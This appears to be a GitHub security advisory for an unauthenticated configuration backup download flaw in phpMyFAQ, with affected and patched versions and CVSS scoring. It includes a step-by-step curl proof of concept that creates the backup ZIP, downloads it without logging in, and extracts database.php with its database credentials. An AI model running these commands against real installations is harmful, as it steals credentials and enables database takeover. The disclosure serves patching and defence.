Skip to content

Unauthenticated config backup download via /api/setup/backup

High
thorsten published GHSA-9cg9-4h4f-j6fg Dec 29, 2025

Package

phpMyFAQ (phpMyFAQ)

Affected versions

Affected versions <= 4.1.0-RC

Patched versions

4.0.16

Description

Summary

An unauthenticated remote attacker can trigger generation of a configuration backup ZIP via POST /api/setup/backup and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., database.php with database credentials), leading to high-impact information disclosure and potential follow-on compromise.

Details

The endpoint /api/setup/backup is reachable via default rewrite rules and does not enforce authentication/authorization or API token verification. When called with any non-empty body (used as an “installed version” string), the server creates a ZIP archive inside the configuration directory and returns a direct URL to the generated ZIP file.

Relevant code paths:

  • Rewrite rule exposing the endpoint:
    • phpmyfaq/.htaccess: RewriteRule ^api/setup/(check|backup|update-database) api/index.php [L,QSA]
  • Controller implementation:
    • phpmyfaq/src/phpMyFAQ/Controller/Api/SetupController.phpbackup()
      • No call to hasValidToken(), userIsAuthenticated(), or any permission check
  • Backup creation:
    • phpmyfaq/src/phpMyFAQ/Setup/Update.phpcreateConfigBackup()
      • Writes the ZIP into the config directory and returns a public URL under content/core/config/

PoC

Replace BASE_URL with your instance URL.

  1. Trigger config backup generation without authentication:
BASE_URL="http://localhost"
curl -i -X POST "${BASE_URL}/api/setup/backup" \
  -H "Content-Type: text/plain" \
  --data "4.1.0-RC"

Expected result: 200 OK with JSON containing backupFile.

  1. Copy the backupFile URL from the JSON response and download it (still without authentication):
# Example (replace with the exact URL returned in step 1)
curl -i "http://localhost/content/core/config/phpmyfaq-config-backup.YYYY-MM-DD.zip" -o phpmyfaq-config-backup.zip
  1. Verify sensitive content exists in the ZIP:
unzip -l phpmyfaq-config-backup.zip
unzip -p phpmyfaq-config-backup.zip database.php

Observed: database.php is included and contains DB host/user/password.

Impact

  • Vulnerability class: Missing authentication/authorization for a sensitive function + sensitive information exposure.
  • Who is impacted: Any internet-exposed phpMyFAQ installation where the default .htaccess rewrite rules are active and the endpoint is reachable.
  • Security impact: Disclosure of configuration secrets (DB credentials, integration config, etc.), enabling follow-on attacks such as database takeover and data exfiltration.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2025-69200

Weaknesses

No CWEs

Credits